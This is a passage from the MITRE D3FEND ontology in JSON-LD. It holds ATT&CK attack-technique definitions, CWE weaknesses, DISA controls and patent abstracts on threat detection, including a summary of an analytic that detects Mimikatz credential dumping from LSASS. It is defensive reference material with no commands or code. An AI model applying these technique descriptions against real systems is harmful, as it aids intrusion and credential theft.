      "d3f:definition": "The product accepts path input in the form of multiple internal dot ('file...dir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'file...name' (Multiple Internal Dot)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-165"
        },
        {
          "@id": "d3f:CWE-44"
        }
      ]
    },
    {
      "@id": "d3f:T1614.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1614.001",
      "d3f:definition": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)",
      "d3f:queries": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "System Language Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1614"
        },
        {
          "@id": "_:N77c1a90bccce46c5a54daf6d020c01f5"
        }
      ]
    },
    {
      "@id": "_:N77c1a90bccce46c5a54daf6d020c01f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:T1548.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:abuses": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "d3f:attack-id": "T1548.005",
      "d3f:definition": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.",
      "d3f:uses": {
        "@id": "d3f:CloudUserAccount"
      },
      "rdfs:label": "Temporary Elevated Cloud Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:Nae4ce6f851b44e499c0d8f4b4a59557c"
        },
        {
          "@id": "_:Nf473f8c61f8c40febd0cfc7a907c3078"
        }
      ]
    },
    {
      "@id": "_:Nae4ce6f851b44e499c0d8f4b4a59557c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:abuses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:Nf473f8c61f8c40febd0cfc7a907c3078",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:risk-impact",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Risk impact rating, expressed on a numeric scale from 1 (lowest impact) to 5 (highest impact) in the context of a 5x5 risk matrix. Impact is used here as a synonym for consequence, another popular term used in risk analysis.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.cto.mil/wp-content/uploads/2024/05/RIO-2023-2-2.pdf"
      },
      "rdfs:label": "risk-impact",
      "rdfs:range": {
        "@id": "_:N3229f2722e8c4842b370a134d38185ca"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "_:N3229f2722e8c4842b370a134d38185ca",
      "@type": "rdfs:Datatype",
      "owl:onDatatype": {
        "@id": "xsd:integer"
      },
      "owl:withRestrictions": {
        "@list": [
          {
            "@id": "_:Nf11ce9605f314c61b773adf651c3125a"
          },
          {
            "@id": "_:N99cd1dff73e14e7fa1d6f150d0f86db2"
          }
        ]
      }
    },
    {
      "@id": "_:Nf11ce9605f314c61b773adf651c3125a",
      "xsd:minInclusive": 1
    },
    {
      "@id": "_:N99cd1dff73e14e7fa1d6f150d0f86db2",
      "xsd:maxInclusive": 5
    },
    {
      "@id": "d3f:DS0041",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:broader": {
        "@id": "d3f:CodeAnalyzer"
      },
      "d3f:definition": "Application vetting report generated by an external cloud service.",
      "rdfs:label": "Application Vetting (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-114",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-114",
      "d3f:definition": "Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.",
      "rdfs:label": "Process Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-73"
      }
    },
    {
      "@id": "d3f:CCI-002426_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a trusted communications path that is logically isolated and distinguishable from other paths.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002426"
    },
    {
      "@id": "d3f:Reference-SystemForDetectingThreatsUsingScenario-basedTrackingOfInternalAndExternalNetworkTraffic_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191563A1"
      },
      "d3f:kb-abstract": "Disclosed is an improved approach to implement a system and method for detecting insider threats, where models are constructed that is capable of defining what constitutes the normal behavior for any given hosts and quickly find anomalous behaviors that could constitute a potential threat to an organization. The disclosed approach provides a way to identify abnormal data transfers within and external to an organization without the need for individual monitoring software on each host, by leveraging metadata that describe the data exchange patterns observed in the network.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; David Lopes Pegna",
      "d3f:kb-mitre-analysis": "Determination of anomalous data transfers is performed over a given time period. For example, a check of a pull vs. push data ratio can be established over a specific time period, e.g., over a three-hour period, over a one day period, over a one week period, etc.\n\nThe system can also establish a baseline behavior for data exchange for each host in terms of pull vs. push data ratio for each resource contacted by the host.\n\nNetwork packet capture data is collected and metadata is extracted. Aggregate data push/pull information from the metadata is then analyzed for a given host versus specific client to server relationships. This technique can potentially catch lateral data transfers, and may have filtering on alerting logic to only raise alarms when external hosts receive large data transfers.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:PerHostDownload-UploadRatioAnalysis"
      },
      "d3f:kb-reference-title": "System for detecting threats using scenario-based tracking of internal and external network traffic",
      "rdfs:label": "Reference - System for detecting threats using scenario-based tracking of internal and external network traffic - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:Reference-CredentialDumpingViaMimikatz_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-004/"
      },
      "d3f:kb-abstract": "Credential dumpers like Mimikatz can be loaded into memory and from there read data from another process. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are \"overtuned\" to look for common access patterns used by Mimikatz.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-004: Credential Dumping via Mimikatz",
      "rdfs:label": "Reference - CAR-2019-04-004: Credential Dumping via Mimikatz - MITRE"
    },
    {
      "@id": "d3f:Mode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MOD",
      "d3f:definition": "The most frequent value in the data set. This is the only central tendency measure that can be used with nominal data, which have purely qualitative category assignments.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:CWE-474",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-474",
      "d3f:definition": "The code uses a function that has inconsistent implementations across operating systems and versions.",
      "rdfs:label": "Use of Function with Inconsistent Implementations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:T1074.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1074.002",
      "d3f:definition": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
      "d3f:modifies": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "Remote Data Staging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1074"
        },
        {
          "@id": "_:N92e8686b57164fac9adefe098fbbe8f5"
        }
      ]
    },
    {
      "@id": "_:N92e8686b57164fac9adefe098fbbe8f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:CWE-640",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-640",
      "d3f:definition": "The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.",
      "rdfs:label": "Weak Password Recovery Mechanism for Forgotten Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:Reference-VirtualizedProcessIsolation_AdvancedMicroDevicesInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180081829A1"
      },
      "d3f:kb-abstract": "Systems, apparatuses, and methods for implementing virtualized process isolation are disclosed. A system includes a kernel and multiple guest VMs executing on the system's processing hardware. Each guest VM includes a vShim layer for managing kernel accesses to user space and guest accesses to kernel space. The vShim layer also maintains a separate set of page tables from the kernel page tables. In one embodiment, data in the user space is encrypted and the kernel goes through the vShim layer to access user space data. When the kernel attempts to access a user space address, the kernel exits and the vShim layer is launched to process the request. If the kernel has permission to access the address, the vShim layer copies the data to a region in kernel space and then returns execution to the kernel.",
      "d3f:kb-author": "David A. Kaplan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Advanced Micro Devices Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Virtualized process isolation",
      "rdfs:label": "Reference - Virtualized process isolation - Advanced Micro Devices Inc"
    },
    {
      "@id": "d3f:ScheduledJobCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the addition of a new task to the system's scheduler, defining its execution criteria and associated actions.",
      "rdfs:label": "Scheduled Job Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:ScheduledJobEvent"
      }
    },
    {
      "@id": "d3f:process-user",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-user y: The process x has been executed by the user y.",
      "rdfs:label": "process-user",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-property"
      },
      "skos:altLabel": "processUser"
    },
    {
      "@id": "d3f:CWE-598",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-598",
      "d3f:definition": "The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request.",
      "rdfs:label": "Use of GET Request Method With Sensitive Query Strings",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-201"
      }
    },
    {
      "@id": "d3f:CCI-001453_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of remote access sessions.",
      "d3f:exactly": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001453"
    },
    {
      "@id": "d3f:T1553.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1553.005",
      "d3f:definition": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)",
      "rdfs:label": "Mark-of-the-Web Bypass",
      "rdfs:subClassOf": {
        "@id": "d3f:T1553"
      }
    },
    {
      "@id": "d3f:ServiceDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the uninstallation or deregistration of a service application, ensuring it is no longer operational or available to clients.",
      "rdfs:label": "Service Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationDeletionEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nd6d25b438e7d401586d9b408f9b87771"
        }
      ]
    },
    {
      "@id": "_:Nd6d25b438e7d401586d9b408f9b87771",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:IPReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IPReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IPAddress"
      },
      "d3f:d3fend-id": "D3-IPRA",
      "d3f:definition": "Analyzing the reputation of an IP address.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Database_for_receiving_storing_and_compiling_information_about_email_messages"
        },
        {
          "@id": "d3f:Reference-Finding_phishing_sites"
        }
      ],
      "rdfs:label": "IP Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:N75a3c68951bd45fdb5eb27ee34cdc5fb"
        }
      ]
    },
    {
      "@id": "_:N75a3c68951bd45fdb5eb27ee34cdc5fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IPAddress"
      }
    },
    {
      "@id": "d3f:M1042",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        }
      ],
      "rdfs:label": "Disable or Remove Feature or Program"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160142424A1"
      },
      "d3f:kb-abstract": "A system is connected to a plurality of user devices coupled to an enterprise's network. The system continuously collects, stores, and analyzes forensic data related to the enterprise's network. Based on the analysis, the system is able to determine normal behavior of the network and portions thereof and thereby identify abnormal behaviors within the network. Upon identification of an abnormal behavior, the system determines whether the abnormal behavior relates to a security incident. Upon determining a security incident in any portion of the enterprise's network, the system extracts forensic data respective of the security incident and enables further assessment of the security incident as well as identification of the source of the security incident. The system provides real-time damage assessment respective of the security incident as well as the security incident's attributions.",
      "d3f:kb-author": "Gil BARAK; Shai MORAG",
      "d3f:kb-mitre-analysis": "This patent describes detecting abnormal behavior related to a security incident by collecting and analyzing forensic data in real time. Forensic data may include:\n\n* URLs visited\n* data downloaded or streamed\n* messages received and sent\n* amount of memory used for processing\n\nThe data is then analyzed according to a set of dynamically created rules to determine normal behavior patterns associated with the network or user devices. Anomalies between current behavior and normal behavior patterns trigger an alert.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        },
        {
          "@id": "d3f:WebSessionActivityAnalysis"
        }
      ],
      "d3f:kb-reference-title": "System and method thereof for identifying and responding to security incidents based on preemptive forensics",
      "rdfs:label": "Reference - System and method thereof for identifying and responding to security incidents based on preemptive forensics - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CCI-001954_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system electronically verifies Personal Identity Verification (PIV) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001954"
    },
    {
      "@id": "d3f:CCI-000040_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization audits any use of privileged accounts, or roles, with access to organization-defined security functions or security-relevant information, when accessing other system functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000040"
    },
    {
      "@id": "d3f:AccessControlList",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A list of permissions attached to an object.",
      "d3f:restricts": {
        "@id": "d3f:UserGroup"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Access-control_list"
      },
      "rdfs:label": "Access Control List",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlConfiguration"
        },
        {
          "@id": "_:N9ff5fe5d64bf4695aa24385ea23b12eb"
        }
      ]
    },
    {
      "@id": "_:N9ff5fe5d64bf4695aa24385ea23b12eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserGroup"
      }
    },
    {
      "@id": "d3f:ASCIIDomainName",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "rdfs:label": "ASCII Domain Name"
    },
    {
      "@id": "d3f:T1606",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1606",
      "d3f:definition": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.",
      "d3f:forges": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Forge Web Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N7bde530740944e7e8a5e849eb8f99a1e"
        }
      ]
    },
    {
      "@id": "_:N7bde530740944e7e8a5e849eb8f99a1e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T1108",
      "@type": "owl:Class",
      "d3f:attack-id": "T1108",
      "d3f:definition": "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**",
      "rdfs:label": "Redundant Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1118",
      "@type": "owl:Class",
      "d3f:attack-id": "T1118",
      "d3f:definition": "InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.004",
      "rdfs:label": "InstallUtil",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1590",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590",
      "d3f:definition": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.",
      "rdfs:label": "Gather Victim Network Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:IMP-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0003",
      "d3f:definition": "Measures designed to temporarily eliminate the use, access, or operation of a system for a period of time, usually without physical damage to the affected system. Threat actors may seek to deny ground controllers and other interested parties access to the victim spacecraft. This would be done by exhausting system resources, degrading subsystems, or blocking communications entirely. This behavior is different from Disruption as this seeks to deny communications entirely, rather than stop them for a length of time.",
      "rdfs:label": "Denial - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Denial"
    },
    {
      "@id": "d3f:Receiver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A receiver is a device or system that acquires signals and converts them into usable information. It senses a physical carrier (such as electromagnetic fields, light, electrical currents, or acoustic waves), conditions the input, and extracts the intended content through operations like filtering, amplification, detection, synchronization, demodulation, decoding, and error correction. A receiver may be analog or digital, implemented in hardware, software, or both, and is designed to mitigate impairments such as noise, interference, and distortion while delivering recovered data or media to downstream processes.",
      "d3f:receives": {
        "@id": "d3f:Signal"
      },
      "rdfs:label": "Receiver",
      "rdfs:seeAlso": {
        "@id": "https://www.analog.com/en/resources/glossary/receiver.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Nffd06f51e4994799b7485daa9f22388a"
        }
      ]
    },
    {
      "@id": "_:Nffd06f51e4994799b7485daa9f22388a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:receives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:associated-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x associated-with y: The subject x and object y are associated in some way.  This is the most general definite relationship in d3fend (i.e., most general relationship that is not prefixed by 'may-'.)",
      "rdfs:label": "associated-with",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13804981-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1048.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048.002",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "rdfs:label": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1048"
        },
        {
          "@id": "_:N0bfe2e6756cb438398d84da7f52054ee"
        },
        {
          "@id": "_:Nacebdb4c51b1426d911be1befdcac23e"
        }
      ]
    },
    {
      "@id": "_:N0bfe2e6756cb438398d84da7f52054ee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Nacebdb4c51b1426d911be1befdcac23e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/a9/40/78/713c8deb2c4c7a/US20190268352A1.pdf"
      },
      "d3f:kb-abstract": "A Content Disarm and Reconstruction (CDR) method is disclosed including a computer receiving an input file having a file format configured with a structured storage. The computer disassembles the structured storage into at least one subfile. Each subfile is a stream subfile. For each subfile, the computer identifies an item in the stream subfile. The computer analyzes the item in the stream subfile for an unwanted behavior by determining an acceptability of the unwanted behavior, distinguishing a visibility of the item, and recognizing a necessity of the item. The computer, based on a result of the analyzing step, processes the item in the stream subfile resulting in a processed subfile. The computer assembles the processed subfiles into an output file having the same file format as the input file.",
      "d3f:kb-author": "Taeil Goh, Vinh Nguyen Xuan Lam, Nhut Minh Ngo, Dung Huu Nguyen",
      "d3f:kb-organization": "OPSWAT, Inc.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ContentExcision"
        },
        {
          "@id": "d3f:ContentFiltering"
        },
        {
          "@id": "d3f:ContentFormatConversion"
        },
        {
          "@id": "d3f:ContentModification"
        },
        {
          "@id": "d3f:ContentRebuild"
        },
        {
          "@id": "d3f:ContentSubstitution"
        }
      ],
      "d3f:kb-reference-title": "Method For Content Disarm and Reconstruction",
      "rdfs:label": "Reference - Method For Content Disarm and Reconstruction - OPSWAT Inc"
    },
    {
      "@id": "d3f:Reference-SystemsAndMethodsForDetectingAnd_orHandlingTargetedAttacksInTheEmailChannel_GraphusInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170324767A1"
      },
      "d3f:kb-abstract": "Techniques for detecting and/or handling target attacks in an enterprise's email channel are provided. The techniques include receiving aspects of an incoming email message addressed to a first email account holder, selecting a recipient interaction profile and/or a sender profile from a plurality of predetermined profiles stored in a memory based upon the received properties, determining a message trust rating associated with the incoming email message based upon the incoming email message and the selected recipient interaction profile and/or the sender profile; and generating an alert identifying the incoming email message as including a security risk based upon the determined message trust rating. The recipient interaction profile includes information associating the first email account holder and a plurality of email senders from whom email messages have previously been received for the first email account holder, and the sender profile includes information associating a sender of the incoming email message with characteristics determined from a plurality of email messages previously received from the sender.",
      "d3f:kb-author": "Manoj Kumar Srivastava",
      "d3f:kb-mitre-analysis": "The patent describes using sender trust rating and sender MTA trust rating as an indicator of level of email security risk.\n\n### Sender Reputation explanation\nThis patent includes Sender Reputation because it describes sender trust rating being used as an indicator of the level of security risk and/or trust level associated with an email sender. The sender trust rating may be determined based on one or more of:\n\n* length of time sender has known the enterprise\n* number of recipients in the enterprise the sender interacts with\n* sender vs. enterprise originated message ratio\n* sender messages open vs. not-open ratio\n* number of emails received from this sender\n* number of emails replied for this sender\n* number of emails from this sender not opened\n* number of emails from this sender not opened that contain an attachment\n* number of emails from this sender not opened that contain a URL\n* number of emails sent to this sender\n* number of email replies received from this sender\n\nBased on the trust rating an alert is generated identifying the incoming email message as a security risk.\n\n### Sender MTA Reputation explanation\nThis patent includes Sender MTA Reputation because it describes sender MTA trust rating as an indicator of the level of security risk and/or trust level associated with a sender MTA. The trust rating may be determined based on one or more of:\n\n* length of time MTA has interacted with the enterprise\n* number of sender domains sending emails from the MTA\n* number of recipients in the enterprise the MTA sends emails to\n* number of emails received from this MTA\n* number of email replies received from this MTA\n\nBased on the trust rating an alert is generated identifying the incoming email message as a security risk.",
      "d3f:kb-organization": "Graphus Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Systems and methods for detecting and/or handling targeted attacks in the email channel",
      "rdfs:label": "Reference - Systems and methods for detecting and/or handling targeted attacks in the email channel - Graphus Inc"
    },
    {
      "@id": "d3f:ConfigurationFile",
